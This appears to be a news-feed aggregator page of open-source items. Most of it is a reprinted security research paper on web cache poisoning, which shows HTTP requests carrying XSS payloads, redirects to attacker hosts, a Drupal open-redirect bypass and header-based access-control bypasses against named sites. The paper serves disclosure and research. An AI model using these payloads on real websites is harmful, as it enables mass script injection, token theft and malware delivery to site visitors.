          This Week in Data with Colin Charles 48: Coinbase Powered by MongoDB and Prometheus Graduates in the CNCF      Cache   Translate Page   Web Page Cache   
Colin Charles

Join Percona Chief Evangelist Colin Charles as he covers happenings, gives pointers and provides musings on the open source database community. The call for submitting a talk to Percona Live Europe 2018 is closing today, and while there may be a short extension, have you already got your talk submitted? I suggest doing so ASAP! […]

The post This Week in Data with Colin Charles 48: Coinbase Powered by MongoDB and Prometheus Graduates in the CNCF appeared first on Percona Database Performance Blog.


          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          The Linux Foundation Announces Keynote Speakers For All New Open FinTech Forum To Explore The Intersection Of Financial Services And Open Source      Cache   Translate Page   Web Page Cache   
The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the keynote speakers for Open FinTech Forum, taking placeOctober 10-11 inNew York.
          WhiteSource Launches Free Open Source Vulnerability Checking      Cache   Translate Page   Web Page Cache   

WhiteSource, an open source security and license compliance management solution provider, has launched Vulnerability Checker; a new, free and standalone CLI tool that provides alerts on critical open source vulnerabilities.

By Helen Beal
          Designer UX - UI      Cache   Translate Page   Web Page Cache   

Kaliop Canada Inc. / Montreal

Description de l'entreprise
Le groupe Kaliop est un réseau international d'experts numériques compétents dans la conception, le développement et l’exploitation de projets complexes multi-plateformes, multi-lingues et multi-locations. Implanté à Montpellier, Paris, Londres, mais aussi à Montréal et en Pologne, Kaliop est aujourd’hui un spécialiste des technologies open source, reconnu internationalement et régulièrement primé pour ses réalisations.

read more


          Updated ZenTao to 10.3      Cache   Translate Page   Web Page Cache   
ZenTao (ID : 559) package has been updated to version 10.3. ZenTao is a leading Open Source project management software, which offers Lifetime Free Upgrade, focuses on software development projects management, and supports Story management, Sprint and task, bug tracking, Scrum, Waterfall, Roadmap, Self-Hosted, Your FREE project management too! Review, Rate and View Demo of … Continue reading "Updated ZenTao to 10.3"
          Amazon lança novo SDK para que assistente Alexa funcione em mais carros      Cache   Translate Page   Web Page Cache   

Nesta semana, a Amazon lançou uma versão open source do SDK do Alexa Automotive Core chamado Auto SDK. A ideia é que, com ele, as fabricantes de automóveis consigam integrar o controle de voz da assistente da companhia a um número ainda maior de carros.

O kit de desenvolvimento é gratuito para download e está disponível no GitHub, sendo otimizado para levar a Alexa a painéis de veículos. Com isso, o motorista consegue acionar a assistente por meio de comandos de voz para executar tarefas como tocar músicas, fornecer orientações no trânsito e fazer ligações telefônicas.

Ainda, o Auto SDK leva para os carros alguns recursos da Alexa que, até então, estavam disponíveis apenas em alto-falantes inteligentes, como, por exemplo, controlar dispositivos domésticos à distância, verificar as condições climáticas, entre outros.

Montadoras como Ford e Toyota já levaram a Alexa para alguns de seus modelos mais populares; a assistente da Amazon também já marca presença em veículos da Mercedes-Benz, Hyundai, General Motors. Com o novo SDK, no entanto, a assistente será capaz de executar um número ainda maior de funções.


          Comment on Silencing Alex . . . For Openers by ReadyKilowatt      Cache   Translate Page   Web Page Cache   
Competition is coming. The cellular industry is just about ready to roll out 5G LTE. One of the big pushes is to have fixed-point wireless services to the home using 24GHz spectrum. While it might not be the libertarian panacea of anyone who wants to can be an ISP, it will break the monopoly/duopoly of wired services if only because they already have the back office in place to process payments, send equipment out to customers etc. And it's a new incremental revenue stream so they can let it flounder for a few years. As for Facebag and Twacker, listen to Tom Wood's podcast episode 1212. I'm not a fan of Michael Malice but he has several good points. We will probably see an end, or at least a great reduction in users of Facebook and Twitter as new platforms are rolled out. Heck, we already have people on multiple platforms because of Linkedin for work and Facebook for friends. Mastodon is an interesting alternative to Twitter but has yet to gain much traction. I could see where different groups (a religion or hobby association for example) might set up a Mastodon server for their people to use. The interesting thing about Mastodon is the idea of federation, where servers are cross connected and so you can have both local and global message timelines. https://noagendasocial.com/web/getting-started is a Mastodon server for the No Agenda podcast. Oh and it's all open source: https://github.com/tootsuite/mastodon https://tomwoods.com/ep-1212-michael-malice-on-social-media-alex-jones-and-whats-coming-next/
          My First Pull Request      Cache   Translate Page   Web Page Cache   

I still remember how hard it was to open my first pull request, but when I eventually did, it became probably one of the most rewarding things I’ve done. I wanted to share my story, in the hope of helping people getting over the first mental hurdle.

@andrew built this handy tool – firstpr.me, for looking up your first public pull request, and mine was to Bootstrap!

My first pull request as found on http://firstpr.me/#muan


At the time, I was working in a 4-person startup where I was a designer and front-end developer. We weren’t using the GitHub flow, instead we mainly just rebased all the things. Therefore I wasn’t familiar with branching or the GitHub UI, I didn’t even visit github.com for work, let alone participate in the open source community.

We wanted all of our app’s right-hand side tooltips to be one line, despite their length, so I added a workaround to override the max-width Bootstrap sets by default:

1
2
3
.tooltip.right .tooltip-inner {
  max-width: none;
}

It did kind of help, but then some of the tooltips became mispositioned. The problematic tooltips were the ones longer than the default, while the short ones were fine. After a bit of digging I kind of decided that this bug lies within Bootstrap.

But, what’s the possibility of :crown: the authors of Bootstrap :crown: not knowing this already? Or that they did this intentionally? They know their shit, and do I?… well definitely not as much. I must have missed something, right?

I was putting off fixing this bug because I wasn’t 100% sure if it was me who added a bad fix – and sadly I didn’t know how else to achieve what we wanted, or if there was actually something wrong in Bootstrap.

The bug felt bigger than me, because it was in the ever so popular Twitter Bootstrap, what can I do about it? I’m not that good, certainly not Bootstrap contributors good, right?

At the same time I was getting pressure from my boss – why is this bug not fixed already? And after a bit of discussions, it turned out that my boss had the same concern, “how is it possible that you found a bug in Bootstrap?” and that got me riled up.

I wasn’t stupid, I knew the code, I doubted myself indeed, but that was a confidence thing. Judging the evidence rationally, I had to be right!

Having another person also doubt my debugging outcome made me angry, and I wanted to stand up for myself. It was silly really, I was doing the exact same thing to myself, but I didn’t feel it.

So, I got the courage and opened up the pull request on Bootstrap. As you can see on twbs/bootstrap#6703. The fix was dead simple, but I still probably rewrote the PR body and redid the example tens of times. The jsbin URL was at the 10th revision! I read so many other pull requests trying to spot common mistakes, and thought I had covered them all, but as it turned out I missed one important thing – CONTRIBUTING.md*. It said you’d need to add tests and compile the code, so accordingly my pull request was closed by @fat, asking for a test.

OK, it was a setback, but that didn’t mean I was wrong, I just missed something. I wasn’t going to give up that easily.

I got back up, read through the contribution guidelines, combed through the unit test code, learned how to test JavaScript and compile my code, I opened another pull request: twbs/bootstrap#7327, and I waited.

It got merged 4 months later, though I’d already left the startup, it – still – felt – hella – good.

I WON! :trophy:


From the time of my first pull request, to the time that the second pull request got merged, a lot had happened.

I stopped being afraid of GitHub and started putting all the things online. I put up my first real open source project (and got to experience getting lots of issues rather than pull requests!). I also made a popular (in Taiwan) generator game in collaboration with an illustrator friend of mine, and had to make the repository private overnight because he started making much money off of it.

Finally, and most amazingly, I also started interviewing at GitHub. During the interview process, the most memorable part was getting an email from @mdo, and hearing him say in FaceTime: “I saw your pull request, and thought holy shit that’s muan! I recognize her!” :heart_eyes:


I wouldn’t be here if not for having that courage to open the first pull request.

I used to think I was really far from this world of people worthy and capable of coding and collaborating in the open, but I was not, and no one is, ever. To not have participated would have been a huge loss for me.


What’s your first pull request? Would you share your story? If/when you do, please do let me know, and I will include them here.


          Arduino: The Beauty Behind the Software      Cache   Translate Page   Web Page Cache   
Are you trying to find temperature software that’s easy to customize and developer? Learn how Arduino does this in this guide.   What is Arduino? Arduino is defined by its creator as an open source electronic board. What makes this […]
          LHS Episode #240: The Weekender XIV      Cache   Translate Page   Web Page Cache   

Hello and welcome to the 240th episode of Linux in the Ham Shack. In this episode, we outline some of the great amateur radio contests and special events, open source events and distributions, and wine, food and song you can partake of in the next fortnight. Oh no, I said fortnight. Get out there and [...]


          OTTO: A Pi Based Open Source Music Production Box      Cache   Translate Page   Web Page Cache   

Want an open source portable synth workstation that won’t break the bank? Check out OTTO. [Topisani] started OTTO as a clone of the well-known Teenage Engineering OP-1. However, soon [Topisani] decided to branch away from simply cloning the OP-1 — instead, they’re taking a lot of inspiration from it in terms of form factor, but the UI will eventually be quite different.

On the hardware side, the heart of the OTTO is a Raspberry Pi 3. The all-important audio interface is a Fe-Pi Audio Z V2, though a USB interface can be used. The 48 switches and four rotary encoders …read more


          Hollywood gets its own open source foundation      Cache   Translate Page   Web Page Cache   
Open source is everywhere now, so maybe it’s no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) today announced that it has partnered with the Linux Foundation to launch the Academy Software Foundation, a new open source foundation for developers in the motion picture and media space. […]
          PostgreSQL 10.4      Cache   Translate Page   Web Page Cache   
PostgreSQL is a powerful, open source object-relational database system. It has more than 15 years of active development and a proven architecture that has earned it a strong reputation for reliability, data integrity, and correctness. It is fully A...
          Practical Web Cache Poisoning      Cache   Translate Page   Web Page Cache   

image

Abstract

Web cache poisoning has long been an elusive vulnerability, a 'theoretical' threat used mostly to scare developers into obediently patching issues that nobody could actually exploit.

In this paper I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.

I'll illustrate and develop this technique with vulnerabilities that handed me control over numerous popular websites and frameworks, progressing from simple single-request attacks to intricate exploit chains that hijack JavaScript, pivot across cache layers, subvert social media and misdirect cloud services. I'll wrap up by discussing defense against cache poisoning, and releasing the open source Burp Suite Community extension that fueled this research.

This post is also available as a printable whitepaper, and it accompanies my Black Hat USA presentation so slides and a video will become available in due course.

Core Concepts

Caching 101

To grasp cache poisoning, we'll need to take a quick look at the fundamentals of caching. Web caches sit between the user and the application server, where they save and serve copies of certain responses. In the diagram below, we can see three users fetching the same resource one after the other:

image

Caching is intended to speed up page loads by reducing latency, and also reduce load on the application server. Some companies host their own cache using software like Varnish, and others opt to rely on a Content Delivery Network (CDN) like Cloudflare, with caches scattered across geographical locations. Also, some popular web applications and frameworks like Drupal have a built-in cache.

There are also other types of cache, such as client-side browser caches and DNS caches, but they're not the focus of this research.

Cache keys

The concept of caching might sound clean and simple, but it hides some risky assumptions. Whenever a cache receives a request for a resource, it needs to decide whether it has a copy of this exact resource already saved and can reply with that, or if it needs to forward the request to the application server.

Identifying whether two requests are trying to load the same resource can be tricky; requiring that the requests match byte-for-byte is utterly ineffective, as HTTP requests are full of inconsequential data, such as the requester's browser:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Accept: */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Cookie: jessionid=xyz;
Connection: close

Caches tackle this problem using the concept of cache keys – a few specific components of a HTTP request that are taken to fully identify the resource being requested. In the request above, I've highlighted the values included in a typical cache key in orange.

This means that caches think the following two requests are equivalent, and will happily respond to the second request with a response cached from the first:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=pl;
Connection: close
GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=en;
Connection: close

As a result, the page will be served in the wrong language to the second visitor. This hints at the problem – any difference in the response triggered by an unkeyed input may be stored and served to other users. In theory, sites can use the 'Vary' response header to specify additional request headers that should be keyed. in practice, the Vary header is only used in a rudimentary way, CDNs like Cloudflare ignore it outright, and people don't even realise their application supports any header-based input.

This causes a healthy number of accidental breakages, but the fun really starts when someone intentionally sets out to exploit it.

Cache Poisoning

The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

image

In this paper, we're going to poison caches using unkeyed inputs like HTTP headers. This isn't the only way of poisoning caches - you can also use HTTP Response Splitting and Request Smuggling - but I think it's the best. Please note that web caches also enable a different type of attack called Web Cache Deception which should not be confused with cache poisoning.

Methodology

We'll use the following methodology to find cache poisoning vulnerabilities:

image

Rather than attempt to explain this in depth upfront, I'll give a quick overview then demonstrate it being applied to real websites.

The first step is to identify unkeyed inputs. Doing this manually is tedious so I've developed an open source Burp Suite extension called Param Miner that automates this step by guessing header/cookie names, and observing whether they have an effect on the application's response.

After finding an unkeyed input, the next steps are to assess how much damage you can do with it, then try and get it stored in the cache. If that fails, you'll need to gain a better understanding of how the cache works and hunt down a cacheable target page before retrying. Whether a page gets cached may be based on a variety of factors including the file extension, content-type, route, status code, and response headers.

Cached responses can mask unkeyed inputs, so if you're trying to manually detect or explore unkeyed inputs, a cache-buster is crucial. If you have Param Miner loaded, you can ensure every request has a unique cache key by adding a parameter with a value of $randomplz to the query string.

When auditing a live website, accidentally poisoning other visitors is a perpetual hazard. Param Miner mitigates this by adding a cache buster to all outbound requests from Burp. This cache buster has a fixed value so you can observe caching behaviour yourself without it affecting other users.

Case Studies

Let's take a look at what happens when the methodology is applied to real websites. As usual, I've exclusively targeted sites with researcher-friendly security policies. All the vulnerabilities discussed here have been reported and patched, although due to 'private' programs I've unfortunately been forced to redact a few.

Many of these case studies exploit secondary vulnerabilities such as XSS in the unkeyed input, and it's important to remember that without cache poisoning, such vulnerabilities are useless as there's no reliable way to force another user to send a custom header on a cross-domain request. That's probably why they were so easy to find.

Basic Poisoning

In spite of its fearsome reputation, cache poisoning is often very easy to exploit. To get started, let's take a look at Red Hat's homepage. Param Miner immediately spotted an unkeyed input:

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canaryHTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />

Here we can see that the X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag. The next step is to explore whether it's exploitable – we'll start with a simple cross-site scripting payload:

GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

Looks good – we've just confirmed that we can cause a response that will execute arbitrary JavaScript against whoever views it. The final step is to check if this response has been stored in a cache so that it'll be delivered to other users. Don't let the 'Cache Control: no-cache' header dissuade you – it's always better to attempt an attack than assume it won't work. You can verify first by resending the request without the malicious header, and then by fetching the URL directly in a browser on a different machine:

GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.comHTTP/1.1 200 OK

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

That was easy. Although the response doesn't have any headers that suggest a cache is present, our exploit has clearly been cached. A quick DNS lookup offers an explanation – www.redhat.com is a CNAME to www.redhat.com.edgekey.net, indicating that it's using Akamai's CDN.

Discreet poisoning

At this point we've proven the attack is possible by poisoning https://www.redhat.com/en?dontpoisoneveryone=1 to avoid affecting the site's actual visitors. In order to actually poison the blog's homepage and deliver our exploit to all subsequent visitors, we'd need to ensure we sent the first request to the homepage after the cached response expired.

This could be attempted using a tool like Burp Intruder or a custom script to send a large number of requests, but such a traffic-heavy approach is hardly subtle. An attacker could potentially avoid this problem by reverse engineering the target's cache expiry system and predicting exact expiry times by perusing documentation and monitoring the site over time, but that sounds distinctly like hard work.

Luckily, many websites make our life easier. Take this cache poisoning vulnerability in unity3d.com:

GET / HTTP/1.1
Host: unity3d.com
X-Host: portswigger-labs.netHTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

<script src="https://portswigger-labs.net/sites/files/foo.js"></script>

We have an unkeyed input - the X-Host header – being used to generate a script import. The response headers 'Age' and 'max-age' respectively specify the age of the current response, and the age at which it will expire. Taken together, these tell us the precise second we should send our payload to ensure our response gets cached.

Selective Poisoning

HTTP headers can provide other time-saving insights into the inner workings of caches. Take the following well-known website, which is using Fastly and sadly can't be named:

GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 … Firefox/60.0
X-Forwarded-Host: a"><iframe onload=alert(1)>HTTP/1.1 200 OK
X-Served-By: cache-lhr6335-LHR
Vary: User-Agent, Accept-Encoding

<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
</iframe>

This initially looks almost identical to the first example. However, the Vary header tells us that our User-Agent may be part of the cache key, and manual testing confirms this. This means that because we've claimed to be using Firefox 60, our exploit will only be served to other Firefox 60 users. We could use a list of popular user agents to ensure most visitors receive our exploit, but this behaviour has given us the option of more selective attacks. Provided you knew their user agent, you could potentially tailor the attack to target a specific person, or even conceal itself from the website monitoring team.

DOM Poisoning

Exploiting an unkeyed input isn't always as easy as pasting an XSS payload. Take the following request:

GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canaryHTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront

<body data-site-root="https://canary/">

We've got control of the 'data-site-root' attribute, but we can't break out to get XSS and it's not clear what this attribute is even used for. To find out, I created a match and replace rule in Burp to add an 'X-Forwarded-Host: id.burpcollaborator.net' header to all requests, then browsed the site. When certain pages loaded, Firefox sent a JavaScript-generated request to my server:

GET /api/i18n/en HTTP/1.1
Host: id.burpcollaborator.net

The path suggests that somewhere on the website, there's JavaScript code using the data-site-root attribute to decide where to load some internationalisation data from. I attempted to find out what this data ought to look like by fetching https://catalog.data.gov/api/i18n/en, but merely received an empty JSON response. Fortunately, changing 'en' to 'es' gave a clue:

GET /api/i18n/es HTTP/1.1
Host: catalog.data.govHTTP/1.1 200 OK

{"Show more":"Mostrar más"}

The file contains a map for translating phrases into the user's selected language. By creating our own translation file and using cache poisoning to point users toward that, we could translate phrases into exploits:

GET  /api/i18n/en HTTP/1.1
Host: portswigger-labs.netHTTP/1.1 200 OK
...
{"Show more":"<svg onload=alert(1)>"}

The end result? Anyone who viewed a page containing the text 'Show more' would get exploited.

Hijacking Mozilla SHIELD

The 'X-Forwarded-Host' match/replace rule I configured to help with the last vulnerability had an unexpected side effect. In addition to the interactions from catalog.data.gov, I received some that were distinctly mysterious:

GET /api/v1/recipe/signed/ HTTP/1.1
Host: xyz.burpcollaborator.net
User-Agent: Mozilla/5.0 … Firefox/57.0
Accept: application/json
origin: null
X-Forwarded-Host: xyz.burpcollaborator.net

The 'null' origin is quite rare by itself and I'd never seen a browser issue a fully lowercase Origin header before. Sifting through proxy history logs revealed that the culprit was Firefox itself. Firefox had tried to fetch a list of 'recipes' as part of its SHIELD system for silently installing extensions for marketing and research purposes. This system is probably best known for forcibly distributing a 'Mr Robot' extension, causing considerable consumer backlash.

Anyway, it looked like the X-Forwarded-Host header had fooled this system into directing Firefox to my own website in order to fetch recipes:

GET /api/v1/ HTTP/1.1
Host: normandy.cdn.mozilla.net
X-Forwarded-Host: xyz.burpcollaborator.netHTTP/1.1 200 OK
{
  "action-list": "https://xyz.burpcollaborator.net/api/v1/action/",
  "action-signed": "https://xyz.burpcollaborator.net/api/v1/action/signed/",
  "recipe-list": "https://xyz.burpcollaborator.net/api/v1/recipe/",
  "recipe-signed": "https://xyz.burpcollaborator.net/api/v1/recipe/signed/",
  …
}

Recipes look something like:

[{
  "id": 403,
  "last_updated": "2017-12-15T02:05:13.006390Z",
  "name": "Looking Glass (take 2)",
  "action": "opt-out-study",
  "addonUrl": "https://normandy.amazonaws.com/ext/pug.mrrobotshield1.0.4-signed.xpi",
  "filter_expression": "normandy.country in  ['US', 'CA']\n && normandy.version >= '57.0'\n)",
  "description": "MY REALITY IS JUST DIFFERENT THAN YOURS",
}]

This system was using NGINX for caching, which was naturally happy to save my poisoned response and serve it to other users. Firefox fetches this URL shortly after the browser is opened and also periodically refetches it, ultimately meaning all of Firefox's tens of millions of daily users could end up retrieving recipes from my website.

This offered quite a few possibilities. The recipes used by Firefox were signed so I couldn't just install a malicious addon and get full code execution, but I could direct tens of millions of genuine users to a URL of my choice. Aside from the obvious DDoS usage, this would be extremely serious if combined with an appropriate memory corruption vulnerability. Also, some backend Mozilla systems use unsigned recipes, which could potentially be used to obtain a foothold deep inside their infrastructure and perhaps obtain the recipe-signing key. Furthermore, I could replay old recipes of my choice which could potentially force mass installation of an old known-vulnerable extension, or the unexpected return of Mr Robot.

I reported this to Mozilla and they patched their infrastructure in under 24 hours but there was some disagreement about the severity so it was only rewarded with a $1,000 bounty.

Route poisoning

Some applications go beyond foolishly using headers to generate URLs, and foolishly use them for internal request routing:

GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canaryHTTP/1.1 404 Not Found
CF-Cache-Status: MISS

<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>

Goodhire.com is evidently hosted on HubSpot, and HubSpot is giving the X-Forwarded-Server header priority over the Host header and getting confused about which client this request is intended for. Although our input is reflected in the page, it's HTML encoded so a straightforward XSS attack doesn't work here. To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com:

GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-4223616.hs-sites.comHTTP/1.1 200 OK

<script>alert(document.domain)</script>

Cloudflare happily cached this response and served it to subsequent visitors. Inflection passed this report on to HubSpot, who resolved the issue by permanently banning my IP address. After some encouragement they also patched the vulnerability.

Internal misrouting vulnerabilities like this are on particularly common on SaaS applications where there's a single system handling requests intended for many different customers.

Hidden Route Poisoning

Route poisoning vulnerabilities aren't always quite so obvious:

GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canaryHTTP/1.1 302 Found
Location: https://ghost.org/fail/

Cloudflare's blog is hosted by Ghost, who are clearly doing something with the X-Forwarded-Host header. You can avoid the 'fail' redirect by specifying another recognized hostname like blog.binary.com, but this simply results in a mysterious 10 second delay followed by the standard blog.cloudflare.com response. At first glance there's no clear way to exploit this.

When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:

GET / HTTP/1.1
Host: noshandnibble.ghost.ioHTTP/1.1 302 Found
Location: http://noshandnibble.blog/

Crucially, this redirect can also be triggered using the X-Forwarded-Host header:

GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.ioHTTP/1.1 302 Found
Location: http://noshandnibble.blog/

By registering my own ghost.org account and setting up a custom domain, I could redirect requests sent to blog.cloudflare.com to my own site: waf.party. This meant I could hijack resource loads like images:

image

The next logical step of redirecting a JavaScript load to gain full control over blog.cloudflare.com was thwarted by a quirk – if you look closely at the redirect, you'll see it uses HTTP whereas the blog is loaded over HTTPS. This means that browsers' mixed-content protections kick in and block script/stylesheet redirections.

I couldn't find any technical way to make Ghost issue a HTTPS redirect, and was tempted to abandon my scruples and report the use of HTTP rather than HTTPS to Ghost as a vulnerability in the hope that they'd fix it for me. Eventually I decided to crowdsource a solution by making a replica of the problem and placing it in hackxor with a cash prize attached. The first solution was found by Sajjad Hashemian, who spotted that in Safari if waf.party was in the browser's HSTS cache the redirect would be automatically upgraded to HTTPS rather than being blocked. Sam Thomas followed up with a solution for Edge, based on work by Manuel Caballero – issuing a 302 redirect to a HTTPS URL completely bypasses Edge's mixed-content protection.

In total, against Safari and Edge users I could completely compromise every page on blog.cloudflare.com, blog.binary.com, and every other ghost.org client. Against Chrome/Firefox users, I could merely hijack images. Although I used Cloudflare for the screenshot above, as this was an issue in a third party system I choose to report it via Binary because their bug bounty program pays cash, unlike Cloudflare's.

Chaining Unkeyed Inputs

Sometimes an unkeyed input will only confuse part of the application stack, and you'll need to chain in other unkeyed inputs to achieve an exploitable result. Take the following site:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyzHTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz

The X-Forwarded-Host header overrides the domain on the cookie, but none of the URLs generated in the rest of the response. By itself this is useless. However, there's another unkeyed input:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttpsHTTP/1.1 301 Moved Permanently
Location: https://redacted.net/en

This input is also useless by itself, but if we combine the two together we can convert the response into a redirect to an arbitrary domain:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
X-Forwarded-Scheme: nothttpsHTTP/1.1 301 Moved Permanently
Location: https://attacker.com/en

Using this technique it was possible to steal CSRF tokens from a custom HTTP header by redirecting a POST request. I could also obtain stored DOM-based XSS with a malicious response to a JSON load, similar to the data.gov exploit mentioned earlier.

Open Graph Hijacking

On another site, the unkeyed input exclusively affected Open Graph URLs:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.comHTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate

<meta property="og:url" content='https://attacker.com/en'/>

Open Graph is a protocol created by Facebook to let website owners dictate what happens when their content is shared on social media. The og:url parameter we've hijacked here effectively overrides the URL that gets shared, so anyone who shares the poisoned page actually ends up sharing content of our choice.

As you may have noticed, the application sets 'Cache-Control: private', and Cloudflare refuse to cache such responses. Fortunately, other pages on the site explicitly enable caching:

GET /popularPage HTTP/1.1
Host: redacted.net
X-Forwarded-Host: evil.comHTTP/1.1 200 OK
Cache-Control: public, max-age=14400
Set-Cookie: session_id=942…
CF-Cache-Status: MISS

The 'CF-Cache-Status' header here is an indicator that Cloudflare is considering caching this response, but in spite of this the response was never actually cached. I speculated that Cloudflare's refusal to cache this might be related to the session_id cookie, and retried with that cookie present:

GET /popularPage HTTP/1.1
Host: redacted.net
Cookie: session_id=942…;
X-Forwarded-Host: attacker.comHTTP/1.1 200 OK
Cache-Control: public, max-age=14400
CF-Cache-Status: HIT

<meta property="og:url"
content='https://attacker.com/…

This finally got the response cached, although it later turned out that I could have skipped the guesswork and read Cloudflare's cache documentation instead.

In spite of the response being cached, the 'Share' result still remained unpoisoned; Facebook evidently wasn't hitting the particular Cloudflare cache that I'd poisoned. To identify which cache I needed to poison, I took advantage of a helpful debugging feature present on all Cloudflare sites - /cdn-cgi/trace:

image

Here, the colo=AMS line shows that Facebook has accessed waf.party through a cache in Amsterdam. The target website was accessed via Atlanta, so I rented a $2/month VPS there and attempted the poisoning again:

image

After this, anyone who attempted to share various pages on their site would end up sharing content of my choice. Here's a heavily redacted video of the attack:

Video tags are not supported by your browser.

Local Route Poisoning

So far we've seen a cookie-based language hijack, and a plague of attacks that use various headers override the host. At this point in the research I had also found a few variations using bizarre non-standard headers such as 'translate', 'bucket' and 'path_info', and suspected I was missing many others. My next major advancement came after I expanded the header wordlist by downloading and scouring the top 20,000 PHP projects on GitHub for header names.

This revealed the headers X-Original-URL and X-Rewrite-URL which override the request's path. I first noticed them affecting targets running Drupal, and digging through Drupal's code revealed that the support for this header comes from the popular PHP framework Symfony, which in turn took the code from Zend. The end result is that a huge number of PHP applications unwittingly support these headers. Before we try using these headers for cache poisoning, I should point out they're also great for bypassing WAFs and security rules:

GET /admin HTTP/1.1
Host: unity.comHTTP/1.1 403 Forbidden
...
Access is denied
GET /anything HTTP/1.1
Host: unity.com
X-Original-URL: /adminHTTP/1.1 200 OK
...
Please log in

If an application uses a cache, these headers can be abused to confuse it into serving up incorrect pages. For example, this request has a cache key of /education?x=y but retrieves content from /gambling?x=y:

image

The end result is that after sending this request, anyone who tries to access the Unity for education page gets a surprise:

image

The ability to swap around pages is more amusing than serious, but perhaps it has a place in a bigger exploit chain.

Internal Cache Poisoning

Drupal is often used with third party caches like Varnish, but it also contains an internal cache which is enabled by default. This cache is aware of the X-Original-URL header and includes it in its cache key, but makes the mistake of also including the query string from this header:

image

While the previous attack let us replace a path with another path, this one lets us override the query string:

GET /search/node?keys=kittens HTTP/1.1HTTP/1.1 200 OK

Search results for 'snuff'

This is more promising, but it's still quite limited – we need a third ingredient.

Drupal Open Redirect

While reading Drupal's URL-override code, I noticed an extremely risky feature – on all redirect responses, you can override the redirect target using the 'destination' query parameter. Drupal attempts some URL parsing to ensure it won't redirect to an external domain, but this is predictably easy to bypass:

GET //?destination=https://evil.net\@unity.com/ HTTP/1.1
Host: unity.comHTTP/1.1 302 Found
Location: https://evil.net\@unity.com/

Drupal sees the double-slash // in the path and tries to issue a redirect to / to normalize it, but then the destination parameter kicks in. Drupal thinks the destination URL is telling people to access unity.com with the username 'evil.net\' but in practice web browsers automatically convert the \ to /, landing users on evil.net/@unity.com.

Once again, by itself an open redirect is hardly exciting, but now we finally have all the building blocks for a serious exploit.

Persistent redirect hijacking

We can combine the parameter override attack with the open redirect to persistently hijack any redirect. Certain pages on Pinterest's business website happen to import JavaScript via a redirect. The following request poisons the cache entry shown in blue with the parameter shown in orange:

GET /?destination=https://evil.net\@business.pinterest.com/ HTTP/1.1
Host: business.pinterest.com
X-Original-URL: /foo.js?v=1
This hijacks the destination of the JavaScript import, giving me full control of several pages on business.pinterest.com that are supposed to be static:GET /foo.js?v=1 HTTP/1.1HTTP/1.1 302 Found
Location: https://evil.net\@unity.com/

Nested cache poisoning

Other Drupal sites are less obliging, and don't import any important resources via redirects. Fortunately, if the site uses an external cache (like virtually all high-traffic Drupal sites) we can use the internal cache to poison the external cache, and in the process convert any response into a redirection. This is a two-stage attack. First, we poison the internal cache to replace /redir with our malicious redirect:

GET /?destination=https://evil.net\@store.unity.com/ HTTP/1.1
Host: store.unity.com
X-Original-URL: /redir

Next, we poison the external cache to replace /download?v=1 with our pre-poisoned /redir:

GET /download?v=1 HTTP/1.1
Host: store.unity.com
X-Original-URL: /redir

The end result is that clicking 'Download installer' on unity.com would download some opportunistic malware from evil.net. This technique could also be used for a wealth of other attacks including inserting spoofed entries into RSS feeds, replacing login pages with phishing pages, and stored XSS via dynamic script imports.

Here's a a video of one such attack on a stock Drupal installation:

Video tags are not supported by your browser.

This vulnerability was disclosed to the Drupal, Symfony and Zend teams on 2018-05-29 and support for these headers has hopefully been disabled via a coordinated patch release by the time you read this.

Cross-Cloud Poisoning

As you could probably have guessed, some of these vulnerability reports triggered interesting reactions and responses.

